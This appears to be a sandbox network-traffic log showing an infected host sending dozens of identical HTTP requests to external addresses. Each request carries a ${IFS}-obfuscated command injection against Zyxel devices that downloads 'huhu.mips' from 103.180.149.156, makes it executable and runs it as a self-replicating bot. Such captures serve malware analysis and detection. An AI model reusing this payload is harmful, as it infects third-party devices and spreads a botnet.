                                            Feb 2, 2024 06:21:14.656492949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4698192.168.2.154538254.87.243.17443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.656527996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4699192.168.2.1548442103.49.143.246443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.656579018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4700192.168.2.154491666.119.157.105443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.656610966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4701192.168.2.1548920101.88.3.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.656627893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4702192.168.2.153538471.154.167.207443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.656681061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4703192.168.2.1538670184.225.195.124443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.656714916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4704192.168.2.1538600172.235.186.200443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.656742096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4705192.168.2.154658661.126.70.59443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.656779051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4706192.168.2.1553118118.77.147.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.656821012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4707192.168.2.1547570185.128.24.104443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.656848907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4708192.168.2.1539742111.152.33.232443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.656889915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4709192.168.2.1539286120.120.120.76443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.656919003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4710192.168.2.1537372157.43.142.206443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.656950951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4711192.168.2.1543258191.41.24.100443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.656982899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4712192.168.2.154129694.5.157.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.657035112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4713192.168.2.1555908150.235.219.65443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.657064915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4714192.168.2.155683418.199.215.183443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.657105923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4715192.168.2.1533682216.234.204.152443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.657149076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4716192.168.2.1559800216.39.193.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.657171965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4717192.168.2.1540730121.78.74.200443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.657213926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4718192.168.2.1544090177.220.9.241443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.657248974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4719192.168.2.1550156184.150.222.44443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.657289028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4720192.168.2.1539638113.190.97.6443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.657330990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4721192.168.2.1551164177.132.230.247443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.657371044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4722192.168.2.154611219.39.236.115443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.657411098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4723192.168.2.1557030116.175.53.111443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.657443047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4724192.168.2.155974813.23.45.42443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.657469034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4725192.168.2.1543902134.240.205.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.657505035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4726192.168.2.1560918159.154.97.57443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.657541037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4727192.168.2.155360625.254.94.141443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.657594919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4728192.168.2.155414045.105.129.199443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.657618046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4729192.168.2.1540044144.79.245.214443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.657670975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4730192.168.2.1547646171.253.43.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.657697916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4731192.168.2.154100886.108.24.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.657748938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4732192.168.2.155236289.198.248.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.657777071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4733192.168.2.1560812206.63.28.190443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.657821894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4734192.168.2.1532970196.100.220.31443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.657866955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4735192.168.2.1544230112.123.36.129443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.657902002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4736192.168.2.1543900146.20.217.12443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.657928944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4737192.168.2.155061688.205.200.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.657967091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4738192.168.2.1560240138.116.80.209443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.657994032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4739192.168.2.1560886193.101.250.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.658029079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4740192.168.2.1542326128.106.133.124443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.658071995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4741192.168.2.154596092.113.212.28443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.658119917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4742192.168.2.15570268.118.95.76443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.658144951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4743192.168.2.1544522186.165.251.138443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.658169031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4744192.168.2.1533258166.100.40.144443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.658231974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4745192.168.2.1549870135.152.147.250443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.658257008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4746192.168.2.1545376198.26.55.217443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.658291101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4747192.168.2.155691644.102.208.21443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.658340931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4748192.168.2.1545378150.210.201.52443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.658386946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4749192.168.2.154818050.146.5.83443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.658406019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4750192.168.2.1542264173.191.207.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.658448935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4751192.168.2.153879225.133.111.22443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.658494949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4752192.168.2.1559458135.57.148.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.658521891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4753192.168.2.154295458.157.53.246443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.658567905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4754192.168.2.1559358120.202.112.229443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.658610106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4755192.168.2.154638048.121.189.196443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.658638000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4756192.168.2.1558550184.151.149.222443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.658679962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4757192.168.2.154881692.206.81.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.658710957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4758192.168.2.155825694.120.90.243443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.658729076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4759192.168.2.1539390111.119.53.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.658786058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4760192.168.2.153397223.202.51.227443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:14.658835888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4761192.168.2.153851493.171.154.0443
                                            TimestampBytes transferredDirectionData
